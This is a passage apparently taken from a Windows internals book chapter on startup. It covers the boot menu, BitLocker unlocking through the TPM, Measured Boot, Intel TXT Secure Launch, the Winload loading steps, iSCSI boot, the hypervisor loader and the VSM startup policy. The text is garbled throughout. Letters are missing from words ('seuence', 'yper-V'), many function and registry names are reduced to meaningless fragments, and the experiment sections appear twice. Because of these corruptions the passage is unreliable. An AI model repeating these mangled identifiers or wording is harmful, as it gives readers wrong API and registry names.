menu is drawn on top of the Win32 subsystem; we describe its architecture later in this chapter in the
”Smss, Csrss, and Wininit” section.
The bootmenupolicy boot option controls whether the Boot Loader should use the old or new
technology to show the boot menu. If there are no OEM boot sequences, Bootmgr enumerates the
system boot entry GUIDs that are linked into the displayorder boot option of the Boot Manager. (If this
value is empty, Bootmgr relies on the default entry.) For each GUID found, Bootmgr opens the relative
BCD object and queries the type of boot application, its startup device, and the readable description.
All three attributes must exist; otherwise, the Boot entry is considered invalid and will be skipped. If
Bootmgr doesn’t find a valid boot application, it shows an error message to the user and the entire
Boot process is aborted. The boot menu display algorithm begins here. One of the key functions,
BmpProcessBootEntry, is used to decide whether to show the Legacy Boot menu:
I
If the boot menu policy of the default boot application (and not of the Bootmgr entry) is ex-
plicitly set to the Modern type, the algorithm exits immediately and launches the default entry
through the BmpLaunchBootEntry function. Noteworthy is that in this case no user keys are
checked, so it is not possible to force the boot process to stop. If the system has multiple boot
entries, a special BCD option5 is added to the in-memory boot option list of the default boot
application. In this way, in the later stages of the System Startup, Winlogon can recognize the
option and show the Modern menu.
I
Otherwise, if the boot policy for the default boot application is legacy (or is not set at all) and
there is only an entry, BmpProcessBootEntry checks whether the user has pressed the F8 or F10
key. These are described in the bootmgr.xsl resource file as the Advanced Options and Boot
5 The multi-boot “special option” has no name. Its element code is BCDE_LIBRARY_TYPE_MULTI_BOOT_SYSTEM
(that corresponds to 0x16000071 in hexadecimal value).
800
CHAPTER 12
Startup and shutdown
Options keys. If Bootmgr detects that one of the keys is pressed at startup time, it adds the rela-
tive BCD element to the in-memory boot options list of the default boot application (the BCD
element is not written to the disk). The two boot options are processed later in the Windows
Loader. Finally, BmpProcessBootEntry checks whether the system is forced to display the boot
menu even in case of only one entry (through the relative “displaybootmenu” BCD option).
I
In case of multiple boot entries, the timeout value (stored as a BCD option) is checked and, if it
is set to 0, the default application is immediately launched; otherwise, the Legacy Boot menu is
shown with the BmDisplayBootMenu function.
While displaying the Legacy Boot menu, Bootmgr enumerates the installed boot tools that are listed
in the toolsdisplayorder boot option of the Boot Manager.
Launching a boot application
The last goal of the Windows Boot Manager is to correctly launch a boot application, even if it resides
on a BitLocker-encrypted drive, and manage the recovery sequence in case something goes wrong.
BmpLaunchBootEntry receives a GUID and the boot options list of the application that needs to be ex-
ecuted. One of the first things that the function does is check whether the specified entry is a Windows
Recovery (WinRE) entry (through a BCD element). These kinds of boot applications are used when deal-
ing with the recovery sequence. If the entry is a WinRE type, the system needs to determine the boot
application that WinRE is trying to recover. In this case, the startup device of the boot application that
needs to be recovered is identified and then later unlocked (in case it is encrypted).
The BmTransferExecution routine uses the services provided by the boot library to open the device
of the boot application, identify whether the device is encrypted, and, if so, decrypt it and read the
target OS loader file. If the target device is encrypted, the Windows Boot Manager tries first to get
the master key from the TPM. In this case, the TPM unseals the master key only if certain conditions
are satisfied (see the next paragraph for more details). In this way, if some startup configuration has
changed (like the enablement of Secure Boot, for example), the TPM won’t be able to release the key.
If the key extraction from the TPM has failed, the Windows Boot Manager displays a screen similar to
the one shown in Figure 12-6, asking the user to enter an unlock key (even if the boot menu policy is
set to Modern, because at this stage the system has no way to launch the Modern Boot user interface).
At the time of this writing, Bootmgr supports four different unlock methods: PIN, passphrase, external
media, and recovery key. If the user is unable to provide a key, the startup process is interrupted and
the Windows recovery sequence starts.
The firmware is used to read and verify the target OS loader. The verification is done through the
Code Integrity library, which applies the secure boot policies (both the systems and all the customized
ones) on the file’s digital signature. Before actually passing the execution to the target boot application,
the Windows Boot Manager needs to notify the registered components (ETW and Measured Boot in
particular) that the boot application is starting. Furthermore, it needs to make sure that the TPM can’t
be used to unseal anything else.
CHAPTER 12 Startup and shutdown
801
FIGURE 12-6 The BitLocker recovery procedure, which has been raised because something in the boot configura-
tion has changed.
Finally, the code execution is transferred to the Windows Loader through lrppln.
This routine returns only in case of certain errors. As before, the Boot Manager manages the latter situ-
ation by launching the Windows Recovery Seuence.
Measured Boot
In late 2006, Intel introduced the Trusted Execution Technology (TXT), which ensures that an authentic
operating system is started in a trusted environment and not modified or altered by an external agent
(like malware). The TXT uses a TPM and cryptographic techniues to provide measurements of soft-
ware and platform (UEFI) components. Windows 8.1 and later support a new feature called Measured
Boot, which measures each component, from firmware up through the boot start drivers, stores those
measurements in the TPM of the machine, and then makes available a log that can be tested remotely
to verify the boot state of the client. This technology would not exist without the TPM. The term mea-
sureen refers to a process of calculating a cryptographic hash of a particular entity, like code, data
structures, configuration, or anything that can be loaded in memory. The measurements are used for
various purposes. Measured Boot provides antimalware software with a trusted (resistant to spoofing
and tampering) log of all boot components that started before Windows. The antimalware software
uses the log to determine whether components that ran before it are trustworthy or are infected with
malware. The software on the local machine sends the log to a remote server for evaluation. Working
with the TPM and non-Microsoft software, Measured Boot allows a trusted server on the network to
verify the integrity of the Windows startup process.
802
CHAPTER 12 Startup and shutdown
The main rules of the TPM are the following
I
Provide a secure nonvolatile storage for protecting secrets
I
Provide platform configuration registers (PCRs) for storing measurements
I
Provide hardware cryptographic engines and a true random number generator
The TPM stores the Measured Boot measurements in PCRs. Each PCR provides a storage area that
allows an unlimited number of measurements in a fixed amount of space. This feature is provided by a
property of cryptographic hashes. The Windows Boot Manager (or the Windows Loader in later stages)
never writes directly into a PCR register it extends the PCR content. The extend operation takes
the current value of the PCR, appends the new measured value, and calculates a cryptographic hash
(SA-1 or SA-256 usually) of the combined value. The hash result is the new PCR value. The extend
method assures the order-dependency of the measurements. One of the properties of the crypto-
graphic hashes is that they are order-dependent. This means that hashing two values A and B produces
two different results from hashing B and A. Because PCRs are extended (not written), even if malicious
software is able to extend a PCR, the only effect is that the PCR would carry an invalid measurement.
Another property of the cryptographic hashes is that it’s impossible to create a block of data that pro-
duces a given hash. Thus, it’s impossible to extend a PCR to get a given result, except by measuring the
same objects in exactly the same order.
At the early stages of the boot process, the System Integrity module of the boot library registers
different callback functions. Each callback will be called later at different points in the startup sequence
with the goal of managing measured-boot events, like Test Signing enabling, Boot Debugger enabling,
PE Image loading, boot application starting, hashing, launching, exiting, and BitLocker unlocking. Each
callback decides which kind of data to hash and to extend into the TPM PCR registers. For instance,
every time the Boot Manager or the Windows Loader starts an external executable image, it generates
three measured boot events that correspond to different phases of the Image loading rn,
pplnse, and pplnune. In this case, the measured entities, which are sent to the
PCR registers (11 and 12) of the TPM, are the following hash of the image, hash of the digital signature
of the image, image base, and size.
All the measurements will be employed later in Windows when the system is completely started, for
a procedure called esn. Because of the uniqueness property of cryptographic hashes, you can
use PCR values and their logs to identify exactly what version of software is executing, as well as its en-
vironment. At this stage, Windows uses the TPM to provide a TPM uote, where the TPM signs the PCR
values to assure that values are not maliciously or inadvertently modified in transit. This guarantees
the authenticity of the measurements. The quoted measurements are sent to an attestation author-
ity, which is a trusted third-party entity that is able to authenticate the PCR values and translate those
values by comparing them with a database of known good values. Describing all the models used for
attestation is outside the scope of this book. The final goal is that the remote server confirms whether
the client is a trusted entity or could be altered by some malicious component.
Earlier we explained how the Boot Manager is able to automatically unlock the BitLocker-encrypted
startup volume. In this case, the system takes advantage of another important service provided by the
TPM secure nonvolatile storage. The TPM nonvolatile random access memory (NVRAM) is persistent
CHAPTER 12 Startup and shutdown
803
across power cycles and has more security features than system memory. While allocating TPM
NVRAM, the system should specify the following
I
Read access rights Specify which TPM privilege level, called locality, can read the data. More
importantly, specify whether any PCRs must contain specific values in order to read the data.
I
Write access rights The same as above but for write access.
I
Attributes/permissions Provide optional authorizations values for reading or writing (like a
password) and temporal or persistent locks (that is, the memory can be locked for write access).
The first time the user encrypts the boot volume, BitLocker encrypts its volume master key (VMK)
with another random symmetric key and then seals that key using the extended TPM PCR values
(in particular, PCR 7 and 11, which measure the BIOS and the Windows Boot seuence) as the sealing
condition. eln is the act of having the TPM encrypt a block of data so that it can be decrypted only
by the same TPM that has encrypted it, only if the specified PCRs have the correct values. In subseuent
boots, if the unsealing is reuested by a compromised boot seuence or by a different BIOS configu-
ration, TPM refuses the reuest to unseal and reveal the VMK encryption key.
EXPERIMENT: Invalidate TPM measurements
In this experiment, you explore a uick way to invalidate the TPM measurements by invalidat-
ing the BIOS configuration. Before measuring the startup seuence, drivers, and data, Measured
Boot starts with a static measurement of the BIOS configuration (stored in PCR1). The measured
BIOS configuration data strictly depends on the hardware manufacturer and sometimes even
includes the UEFI boot order list. Before starting the experiment, verify that your system includes
a valid TPM. Type tpm.msc in the Start menu search box and execute the snap-in. The Trusted
Platform Module (TPM) Management console should appear. Verify that a TPM is present and
enabled in your system by checking that the Status box is set to The TPM Is Ready For Use.
EXPERIMENT: Invalidate TPM measurements
In this experiment, you explore a uick way to invalidate the TPM measurements by invalidat-
ing the BIOS configuration. Before measuring the startup seuence, drivers, and data, Measured
Boot starts with a static measurement of the BIOS configuration (stored in PCR1). The measured
BIOS configuration data strictly depends on the hardware manufacturer and sometimes even
includes the UEFI boot order list. Before starting the experiment, verify that your system includes
a valid TPM. Type tpm.msc in the Start menu search box and execute the snap-in. The Trusted
Platform Module (TPM) Management console should appear. Verify that a TPM is present and
enabled in your system by checking that the Status box is set to The TPM Is Ready For Use.
804
CHAPTER 12 Startup and shutdown
Start the BitLocker encryption of the system volume. If your system volume is already en-
crypted, you can skip this step. ou must be sure to save the recovery key, though. (ou can
check the recovery key by selecting Back Up our Recovery Key, which is located in the Bitlocker
drive encryption applet of the Control Panel.) Open File Explorer by clicking its taskbar icon, and
navigate to This PC. Right-click the system volume (the volume that contains all the Windows
files, usually C) and select Turn On BitLocker. After the initial verifications are made, select Let
Bitlocker Automatically Unlock My Drive when prompted on the Choose ow to Unlock our
Drive at Startup page. In this way, the VMK will be sealed by the TPM using the boot measure-
ments as the unsealing key. Be careful to save or print the recovery key you’ll need it in the next
stage. Otherwise, you won’t be able to access your files anymore. Leave the default value for all
the other options.
After the encryption is complete, switch off your computer and start it by entering the UEFI
BIOS configuration. (This procedure is different for each PC manufacturer check the hardware
user manual for directions for entering the UEFI BIOS settings.) In the BIOS configuration pages,
simply change the boot order and then restart your computer. (You can change the startup
boot order by using the UefiTool utility, which is in the downloadable files of the book.) If your
hardware manufacturer includes the boot order in the TPM measurements, you should get the
BitLocker recovery message before Windows boots. Otherwise, to invalidate the TPM measure-
ments, simply insert the Windows Setup DVD or flash drive before switching on the workstation.
If the boot order is correctly configured, the Windows Setup bootstrap code starts, which prints
Start the BitLocker encryption of the system volume. If your system volume is already en-
crypted, you can skip this step. ou must be sure to save the recovery key, though. (ou can
check the recovery key by selecting Back Up our Recovery Key, which is located in the Bitlocker
drive encryption applet of the Control Panel.) Open File Explorer by clicking its taskbar icon, and
navigate to This PC. Right-click the system volume (the volume that contains all the Windows
files, usually C) and select Turn On BitLocker. After the initial verifications are made, select Let
Bitlocker Automatically Unlock My Drive when prompted on the Choose ow to Unlock our
Drive at Startup page. In this way, the VMK will be sealed by the TPM using the boot measure-
ments as the unsealing key. Be careful to save or print the recovery key you’ll need it in the next
stage. Otherwise, you won’t be able to access your files anymore. Leave the default value for all
the other options.
After the encryption is complete, switch off your computer and start it by entering the UEFI
BIOS configuration. (This procedure is different for each PC manufacturer check the hardware
user manual for directions for entering the UEFI BIOS settings.) In the BIOS configuration pages,
simply change the boot order and then restart your computer. (You can change the startup
boot order by using the UefiTool utility, which is in the downloadable files of the book.) If your
hardware manufacturer includes the boot order in the TPM measurements, you should get the
BitLocker recovery message before Windows boots. Otherwise, to invalidate the TPM measure-
ments, simply insert the Windows Setup DVD or flash drive before switching on the workstation.
If the boot order is correctly configured, the Windows Setup bootstrap code starts, which prints
CHAPTER 12 Startup and shutdown
805
the Press Any Key For Boot From CD Or DVD message. If you don’t press any key, the system pro-
ceeds to boot the next Boot entry. In this case, the startup sequence has changed, and the TPM
measurements are different. As a result, the TPM won’t be able to unseal the VMK.
ou can invalidate the TPM measurements (and produce the same effects) if you have Secure
Boot enabled and you try to disable it. This experiment demonstrates that Measured Boot is tied
to the BIOS configuration.
Trusted execution
Although Measured Boot provides a way for a remote entity to confirm the integrity of the boot
process, it does not resolve an important issue Boot Manager still trusts the machine’s firmware code
and uses its services to effectively communicate with the TPM and start the entire platform. At the
time of this writing, attacks against the UEFI core firmware have been demonstrated multiple times.
The Trusted Execution Technology (TXT) has been improved to support another important feature,
called Secure Launch. Secure Launch (also known as Trusted Boot in the Intel nomenclature) provides
secure authenticated code modules (ACM), which are signed by the CPU manufacturer and executed
806
CHAPTER 12 Startup and shutdown
by the chipset (and not by the firmware). Secure Launch provides the support of dynamic measure-
ments made to PCRs that can be reset without resetting the platform. In this scenario, the OS provides
a special Trusted Boot (TBOOT) module used to initialize the platform for secure mode operation and
initiate the Secure Launch process.
An ueneeule(ACM) is a piece of code provided by the chipset manufacturer. The
ACM is signed by the manufacturer, and its code runs in one of the highest privilege levels within a spe-
cial secure memory that is internal to the processor. ACMs are invoked using a special instruc-
tion. There are two types of ACMs BIOS and SINIT. While BIOS ACM measures the BIOS and performs
some BIOS security functions, the SINIT ACM is used to perform the measurement and launch of the
Operating System TCB (TBOOT) module. Both BIOS and SINIT ACM are usually contained inside the
System BIOS image (this is not a strict requirement), but they can be updated and replaced by the OS if
needed (refer to the “Secure Launch” section later in this chapter for more details).
The ACM is the core root of trusted measurements. As such, it operates at the highest security level
and must be protected against all types of attacks. The processor microcode copies the ACM module in
the secure memory and performs different checks before allowing the execution. The processor verifies
that the ACM has been designed to work with the target chipset. Furthermore, it verifies the ACM in-
tegrity, version, and digital signature, which is matched against the public key hardcoded in the chipset
fuses. The instruction doesn’t execute the ACM if one of the previous checks fails.
Another key feature of Secure Launch is the support of Dynamic Root of Trust Measurement (DRTM)
by the TPM. As introduced in the previous section, Measured Boot, 16 different TPM PCR registers (0
through 15) provide storage for boot measurements. The Boot Manager could extend these PCRs, but
it’s not possible to clear their contents until the next platform reset (or power up). This explains why
these kinds of measurements are called static measurements. Dynamic measurements are measure-
ments made to PCRs that can be reset without resetting the platform. There are six dynamic PCRs
(actually there are eight, but two are reserved and not usable by the OS) used by Secure Launch and
the trusted operating system.
In a typical TXT Boot seuence, the boot processor, after having validated the ACM integrity, ex-
ecutes the ACM startup code, which measures critical BIOS components, exits ACM secure mode, and
jumps to the UEFI BIOS startup code. The BIOS then measures all of its remaining code, configures the
platform, and verifies the measurements, executing the instruction. This TXT instruction loads
the BIOS ACM module, which performs the security checks and locks the BIOS configuration. At this
stage the UEFI BIOS could measure each option ROM code (for each device) and the Initial Program
Load (IPL). The platform has been brought to a state where it’s ready to boot the operating system
(specifically through the IPL code).
The TXT Boot seuence is part of the Static Root of Trust Measurement (SRTM) because the trusted
BIOS code (and the Boot Manager) has been already verified, and it’s in a good known state that will
never change until the next platform reset. Typically, for a TXT-enabled OS, a special TCB (TBOOT)
module is used instead of the first kernel module being loaded. The purpose of the TBOOT module is to
initialize the platform for secure mode operation and initiate the Secure Launch. The Windows TBOOT
CHAPTER 12 Startup and shutdown
807
module is named TcbLaunch.exe. Before starting the Secure Launch, the TBOOT module must be veri-
fied by the SINIT ACM module. So, there should be some components that execute the instruc-
tions and start the DRTM. In the Windows Secure Launch model, this component is the boot library.
Before the system can enter the secure mode, it must put the platform in a known state. (In this
state, all the processors, except the bootstrap one, are in a special idle state, so no other code could
ever be executed.) The boot library executes the instruction, specifying the operation.
This causes the processor to do the following
1.
Validate the SINIT ACM module and load it into the processor’s secure memory.
2.
Start the DRTM by clearing all the relative dynamic PCRs and then measuring the SINIT ACM.
3.
Execute the SINIT ACM code, which measures the trusted OS code and executes the Launch
Control Policy. The policy determines whether the current measurements (which reside in some
dynamic PCR registers) allow the OS to be considered trusted.
When one of these checks fails, the machine is considered to be under attack, and the ACM issues
a TXT reset, which prevents any kind of software from being executed until the platform has been
hard reset. Otherwise, the ACM enables the Secure Launch by exiting the ACM mode and jumping
to the trusted OS entry point (which, in Windows is the n function of the TcbLaunch.exe mod-
ule). The trusted OS then takes control. It can extend and reset the dynamic PCRs for every measure-
ment that it needs (or by using another mechanism that assures the chain of trust).
Describing the entire Secure Launch architecture is outside the scope of this book. Please refer to
the Intel manuals for the TXT specifications. Refer to the Secure Launch section, later in this chapter,
for a description of how Trusted Execution is implemented in Windows. Figure 12-7 shows all the com-
ponents involved in the Intel TXT technology.
CPU
BIOS
TPM
v1.2
Tools
IOH/PCH
TPM by third party
(TCG* compliant)
SINIT AC Module
BIOS AC Module
Third-party
software:
MLE, hosted
OS, apps, etc.
VT-x and TXT support
CPU
VT-x and TXT support
(VMX+SMX)
TXT and
VT-d support in IOH
TPM support
AC modules
and platform
initialization
FIGURE 12-7 Intel TXT (Trusted Execution Technology) components.
808
CHAPTER 12 Startup and shutdown
The Windows OS Loader
The Windows OS Loader (Winload) is the boot application launched by the Boot Manager with the goal
of loading and correctly executing the Windows kernel. This process includes multiple primary tasks
I
Create the execution environment of the kernel. This involves initializing, and using, the kernel’s
page tables and developing a memory map. The EFI OS Loader also sets up and initializes the
kernel’s stacks, shared user page, GDT, IDT, TSS, and segment selectors.
I
Load into memory all modules that need to be executed or accessed before the disk stack is
initialized. These include the kernel and the AL because they handle the early initialization of
basic services once control is handed off from the OS Loader. Boot-critical drivers and the regis-
try system hive are also loaded into memory.
I
Determine whether yper-V and the Secure Kernel (VSM) should be executed, and, if so, cor-
rectly load and start them.
I
Draw the first background animation using the new high-resolution boot graphics library
(BGFX, which replaces the old Bootvid.dll driver).
I
Orchestrate the Secure Launch boot seuence in systems that support Intel TXT. (For a com-
plete description of Measured Boot, Secure Launch, and Intel TXT, see the respective sections
earlier in this chapter). This task was originally implemented in the hypervisor loader, but it has
moved starting from Windows 10 October Update (RS5).
The Windows loader has been improved and modified multiple times during each Windows release.
Osln is the main loader function (called by the Boot Manager) that (re)initializes the boot library
and calls the internal Oslpn. The boot library, at the time of this writing, supports two different
execution contexts
I
Firmware context means that the paging is disabled. Actually, it’s not disabled but it’s provided by
the firmware that performs the one-to-one mapping of physical addresses, and only firmware ser-
vices are used for memory management. Windows uses this execution context in the Boot Manager.
I
Application context means that the paging is enabled and provided by the OS. This is the con-
text used by the Windows Loader.
The Boot Manager, just before transferring the execution to the OS loader, creates and initializes the
four-level x64 page table hierarchy that will be used by the Windows kernel, creating only the self-map
and the identity mapping entries. Osln switches to the Application execution context, just before
starting. The Oslreprere routine captures the boot/shutdown status of the last boot, reading
from the bootstat.dat file located in the system root directory.
When the last boot has failed more than twice, it returns to the Boot Manager for starting the
Recovery environment. Otherwise, it reads in the SSTEM registry hive, WindowsSystem32Config
System, so that it can determine which device drivers need to be loaded to accomplish the boot. (A hive
is a file that contains a registry subtree. More details about the registry were provided in Chapter 10.)
Then it initializes the BGFX display library (drawing the first background image) and shows the
Advanced Options menu if needed (refer to the section The boot menu earlier in this chapter). One
CHAPTER 12 Startup and shutdown
809
of the most important data structures needed for the NT kernel boot, the Loader Block, is allocated
and filled with basic information, like the system hive base address and size, a random entropy value
(queried from the TPM if possible), and so on.
Oslnleerl contains code that ueries the system’s ACPI BIOS to retrieve basic device
and configuration information (including event time and date information stored in the system’s
CMOS). This information is gathered into internal data structures that will be stored under the
KLM ARDWAREDESCRIPTION registry key later in the boot. This is mostly a legacy key that exists
only for compatibility reasons. Today, it’s the Plug and Play manager database that stores the true
information on hardware.
Next, Winload begins loading the files from the boot volume needed to start the kernel initializa-
tion. The boot volume is the volume that corresponds to the partition on which the system directory
(usually Windows) of the installation being booted is located. Winload follows these steps
1.
Determines whether the hypervisor or the Secure Kernel needs to be loaded (through the
ypersrlunype BCD option and the VSM policy) if so, it starts phase 0 of the hypervisor
setup. Phase 0 pre-loads the V loader module (vloader.dll) into RAM memory and executes
its HvlLoadHypervisor initialization routine. The latter loads and maps the hypervisor image
(vix64.exe, vax64.exe, or vaa64.exe, depending on the architecture) and all its dependen-
cies in memory.
2.
Enumerates all the firmware-enumerable disks and attaches the list in the Loader Parameter
Block. Furthermore, loads the Synthetic Initial Machine Configuration hive (Imc.hiv) if specified
by the configuration data and attaches it to the loader block.
3.
Initializes the kernel Code Integrity module (CI.dll) and builds the CI Loader block. The Code
Integrity module will be then shared between the NT kernel and Secure Kernel.
4.
Processes any pending firmware updates. (Windows 10 supports firmware updates distributed
through Windows Update.)
5.
Loads the appropriate kernel and AL images (Ntoskrnl.exe and al.dll by default). If Winload
fails to load either of these files, it prints an error message. Before properly loading the two
modules’ dependencies, Winload validates their contents against their digital certificates and
loads the API Set Schema system file. In this way, it can process the API Set imports.
6.
Initializes the debugger, loading the correct debugger transport.
7.
Loads the CPU microcode update module (Mcupdate.dll), if applicable.
8.
Oslpllulesfinally loads the modules on which the NT kernel and AL depend, ELAM
drivers, core extensions, TPM drivers, and all the remaining boot drivers (respecting the load
orderthe file system drivers are loaded first). Boot device drivers are drivers necessary to
boot the system. The configuration of these drivers is stored in the SSTEM registry hive. Every
device driver has a registry subkey under KLMSSTEMCurrentControlSetServices. For
example, Services has a subkey named rdyboost for the ReadyBoost driver, which you can see in
Figure 12-8 (for a detailed description of the Services registry entries, see the section Services
in Chapter 10). All the boot drivers have a start value of OO (0).
810
CHAPTER 12 Startup and shutdown
9.
At this stage, to properly allocate physical memory, Winload is still using services provided
by the EFI Firmware (the llees boot service routine). The virtual address translation is
instead managed by the boot library, running in the Application execution context.
FIGURE 12-8 ReadyBoost driver service settings.
10. Reads in the NLS (National Language System) files used for internationalization. By default,
these are lintl.nls, C1252.nls, and C437.nls.
11. If the evaluated policies reuire the startup of the VSM, executes phase 0 of the Secure Kernel
setup, which resolves the locations of the VSM Loader support routines (exported by the
vloader.dll module), and loads the Secure Kernel module (Securekernel.exe) and all of its
dependencies.
12. For the S edition of Windows, determines the minimum user-mode configurable code integrity
signing level for the Windows applications.
13. Calls the Oslrperneleupse routine, which performs the memory steps required for
kernel transition, like allocating a GDT, IDT, and TSS mapping the AL virtual address space
and allocating the kernel stacks, shared user page, and USB legacy handoff. Winload uses the
UEFI GetMemoryMap facility to obtain a complete system physical memory map and maps
each physical page that belongs to EFI Runtime Code/Data into virtual memory space. The
complete physical map will be passed to the OS kernel.
14. Executes phase 1 of VSM setup, copying all the needed ACPI tables from VTL0 to VTL1 memory.
(This step also builds the VTL1 page tables.)
15. The virtual memory translation module is completely functional, so Winload calls the
ExitBootServices UEFI function to get rid of the firmware boot services and remaps all
the remaining Runtime UEFI services into the created virtual address space, using the
erulressp UEFI runtime function.
16. If needed, launches the hypervisor and the Secure Kernel (exactly in this order). If successful,
the execution control returns to Winload in the context of the yper-V Root Partition. (Refer to
Chapter 9, Virtualization technologies, for details about yper-V.)
17. Transfers the execution to the kernel through the Oslrrnserernel routine.
CHAPTER 12 Startup and shutdown
811
Booting from iSCSI
Internet SCSI (iSCSI) devices are a kind of network-attached storage in that remote physical disks are
connected to an iSCSI ost Bus Adapter (BA) or through Ethernet. These devices, however, are differ-
ent from traditional network-attached storage (NAS) because they provide block-level access to disks,
unlike the logical-based access over a network file system that NAS employs. Therefore, an iSCSI-
connected disk appears as any other disk drive, both to the boot loader and to the OS, as long as the
Microsoft iSCSI Initiator is used to provide access over an Ethernet connection. By using iSCSI-enabled
disks instead of local storage, companies can save on space, power consumption, and cooling.
Although Windows has traditionally supported booting only from locally connected disks or
network booting through PXE, modern versions of Windows are also capable of natively booting
from iSCSI devices through a mechanism called iSCSI Boot. As shown in Figure 12-9, the boot loader
(Winload.efi) detects whether the system supports iSCSI boot devices reading the iSCSI Boot Firmware
Table (iBFT) that must be present in physical memory (typically exposed through ACPI). Thanks to the
iBFT table, Winload knows the location, path, and authentication information for the remote disk. If the
table is present, Winload opens and loads the network interface driver provided by the manufacturer,
which is marked with the OOOO (0x1) boot flag.
Additionally, Windows Setup also has the capability of reading this table to determine bootable
iSCSI devices and allow direct installation on such a device, such that no imaging is reuired. In combi-
nation with the Microsoft iSCSI Initiator, this is all that’s required for Windows to boot from iSCSI.
Boot
parameter
driver
iBF
Table
EFI
UNDI
NIC
iSCSI initiator
TCPIP
NDIS
NDIS miniport
NIC
Pre-boot Windows
Microsoft iSCSI
Microsoft Windows
Vendor
FIGURE 12-9 iSCSI boot architecture.
The hypervisor loader
The hypervisor loader is the boot module (its file name is vloader.dll) used to properly load and start
the yper-V hypervisor and the Secure Kernel. For a complete description of yper-V and the Secure
Kernal, refer to Chapter 9. The hypervisor loader module is deeply integrated in the Windows Loader
and has two main goals
I
Detect the hardware platform load and start the proper version of the Windows ypervisor
(vix64.exe for Intel Systems, vax64.exe for AMD systems and vaa64.exe for ARM64 systems).
I
Parse the Virtual Secure Mode (VSM) policy load and start the Secure Kernel.
812
CHAPTER 12 Startup and shutdown
In Windows 8, this module was an external executable loaded by Winload on demand. At that time
the only duty of the hypervisor loader was to load and start yper-V. With the introduction of the VSM
and Trusted Boot, the architecture has been redesigned for a better integration of each component.
As previously mentioned, the hypervisor setup has two different phases. The first phase begins in
Winload, just after the initialization of the NT Loader Block. The vLoader detects the target platform
through some CPUID instructions, copies the UEFI physical memory map, and discovers the IOAPICs
and IOMMUs. Then vLoader loads the correct hypervisor image (and all the dependencies, like the
Debugger transport) in memory and checks whether the hypervisor version information matches the
one expected. (This explains why the vLoader couldn’t start a different version of yper-V.) vLoader
at this stage allocates the hypervisor loader block, an important data structure used for passing system
parameters between vLoader and the hypervisor itself (similar to the Windows loader block). The
most important step of phase 1 is the construction of the hypervisor page tables hierarchy. The just-
born page tables include only the mapping of the hypervisor image (and its dependencies) and the
system physical pages below the first megabyte. The latter are identity-mapped and are used by the
startup transitional code (this concept is explained later in this section).
The second phase is initiated in the final stages of Winload the UEFI firmware boot services have
been discarded, so the vLoader code copies the physical address ranges of the UEFI Runtime Services
into the hypervisor loader block captures the processor state disables the interrupts, the debugger,
and paging and calls lprnserypersrrnsnpeto transfer the code execution to
the below 1 MB physical page. The code located here (the transitional code) can switch the page tables,
re-enable paging, and move to the hypervisor code (which actually creates the two different address
spaces). After the hypervisor starts, it uses the saved processor context to properly yield back the code
execution to Winload in the context of a new virtual machine, called root partition (more details avail-
able in Chapter 9).
The launch of the virtual secure mode is divided in three different phases because some steps are
reuired to be done after the hypervisor has started.
1.
The first phase is very similar to the first phase in the hypervisor setup. Data is copied from the
Windows loader block to the just-allocated VSM loader block the master key, IDK key, and
Crashdump key are generated and the SecureKernel.exe module is loaded into memory.
2.
The second phase is initiated by Winload in the late stages of OslPrepareTarget, where the
hypervisor has been already initialized but not launched. Similar to the second phase of the
hypervisor setup, the UEFI runtime services physical address ranges are copied into the VSM
loader block, along with ACPI tables, code integrity data, the complete system physical memo-
ry map, and the hypercall code page. Finally, the second phase constructs the protected page
tables hierarchy used for the protected VTL1 memory space (using the Oslpsuleles
function) and builds the needed GDT.
3.
The third phase is the final launch phase. The hypervisor has already been launched. The
third phase performs the final checks. (Checks such as whether an IOMMU is present, and
CHAPTER 12 Startup and shutdown
813
whether the root partition has VSM privileges. The IOMMU is very important for VSM. Refer
to Chapter 9 for more information.) This phase also sets the encrypted hypervisor crash dump
area, copies the VSM encryption keys, and transfers execution to the Secure Kernel entry
point (yserup). The Secure Kernel entry point code runs in VTL 0. VTL 1 is started by
the Secure Kernel code in later stages through the llnlernl hypercall. (Read
Chapter 9 for more details.)
VSM startup policy
At startup time, the Windows loader needs to determine whether it has to launch the Virtual Secure
Mode (VSM). To defeat all the malware attempts to disable this new layer of protection, the system
uses a specific policy to seal the VSM startup settings. In the default configurations, at the first boot
(after the Windows Setup application has finished to copy the Windows files), the Windows Loader uses
the Oslesly routine to read and seal the VSM configuration, which is stored in the VSM root
registry key urrennrlenrleeur.
VSM can be enabled by different sources
I
Device Guard Scenarios Each scenario is stored as a subkey in the VSM root key. The nle
DWORD registry value controls whether a scenario is enabled. If one or more scenarios are ac-
tive, the VSM is enabled.
I
loal Settings Stored in the nlerulnseeury registry value.
I
ode ntegrity policies Stored in the code integrity policy file (Policy.p7b).
Also, by default, VSM is automatically enabled when the hypervisor is enabled (except if the
yperrulnseeuryOpOu registry value exists).
Every VSM activation source specifies a locking policy. If the locking mode is enabled, the Windows
loader builds a Secure Boot variable, called sly, and stores in it the VSM activation mode and the
platform configuration. Part of the VSM platform configuration is dynamically generated based on the
detected system hardware, whereas another part is read from the equrelreuryeures
registry value stored in the VSM root key. The Secure Boot variable is read at every subseuent boot the
configuration stored in the variable always replaces the configuration located in the Windows registry.
In this way, even if malware can modify the Windows Registry to disable VSM, Windows will simply
ignore the change and keep the user environment secure. Malware won’t be able to modify the VSM
Secure Boot variable because, per Secure Boot specification, only a new variable signed by a trusted
digital signature can modify or delete the original one. Microsoft provides a special signed tool that
could disable the VSM protection. The tool is a special EFI boot application, which sets another signed
Secure Boot variable called slysle. This variable is recognized at startup time by the
Windows Loader. If it exists, Winload deletes the sly secure variable and modifies the registry to
disable VSM (modifying both the global settings and each Scenario activation).
814
CHAPTER 12 Startup and shutdown
EXPERIMENT: Understanding the VSM policy
In this experiment, you examine how the Secure Kernel startup is resistant to external tamper-
ing. First, enable Virtualization Based Security (VBS) in a compatible edition of Windows (usually
the Pro and Business editions work well). On these SKUs, you can uickly verify whether VBS is
enabled using Task Manager if VBS is enabled, you should see a process named Secure System on
the Details tab. Even if it’s already enabled, check that the UEFI lock is enabled. Type Edit Group
policy (or gpeditmsc) in the Start menu search box, and start the Local Policy Group Editor snap-
in. Navigate to Computer Configuration, Administrative Templates, System, Device Guard, and
double-click Turn On Virtualization Based Security. Make sure that the policy is set to Enabled
and that the options are set as in the following figure
EXPERIMENT: Understanding the VSM policy
In this experiment, you examine how the Secure Kernel startup is resistant to external tamper-
ing. First, enable Virtualization Based Security (VBS) in a compatible edition of Windows (usually
the Pro and Business editions work well). On these SKUs, you can uickly verify whether VBS is
enabled using Task Manager if VBS is enabled, you should see a process named Secure System on
